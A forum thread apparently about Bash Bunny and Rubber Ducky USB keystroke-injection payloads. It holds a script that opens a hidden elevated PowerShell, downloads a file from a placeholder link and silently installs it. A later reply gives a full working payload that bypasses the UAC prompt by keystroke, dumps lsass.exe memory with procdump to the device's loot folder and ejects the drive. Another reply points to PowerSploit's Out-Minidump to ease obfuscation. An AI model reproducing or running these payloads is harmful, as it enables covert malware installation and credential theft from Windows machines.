Soultouche Posted May 12, 2017 Share Posted May 12, 2017 Hi, There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly ) DELAY 1500 GUI r DELAY 1000 STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn"" ENTER DELAY 1000 ALT o ALT y So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly. i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver ) Thanks Alot Quote Link to comment Share on other sites More sharing options...
Soultouche Posted May 13, 2017 Author Share Posted May 13, 2017 RUN WIN powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''$DRIVE''').Name+'payloads\\$SWITCH_POSITION\s.msi') /qn" This is exactly what i have to do, but its not working because its not running as admin Quote Link to comment Share on other sites More sharing options...
Soultouche Posted May 22, 2017 Author Share Posted May 22, 2017 Anyone ? Quote Link to comment Share on other sites More sharing options...
rottingsun Posted May 22, 2017 Share Posted May 22, 2017 (edited) Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source bunny_helpers.sh LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH Edited May 22, 2017 by rottingsun Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 23, 2017 Share Posted May 23, 2017 My payload, Slydoor, was made to do this. You should check it out :) (It's in my signature). Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 23, 2017 Share Posted May 23, 2017 Trying to follow if there are any escaped double quotes. Those double quotes will not translate through quack. You will have to escape them to show up in the quack command. Remember, while they are being ran from the bunny payload.txt, they are running in bash still. @rottingsun Check out this script in place of using the procdump.exe so you have more flexibility to obfuscate, if it comes down to it, than what you have with a binary. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1 As long as you are at or above the access level of the process you are dumping, you can get it. Run in a high integrity Powershell shell and it will work on any process. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.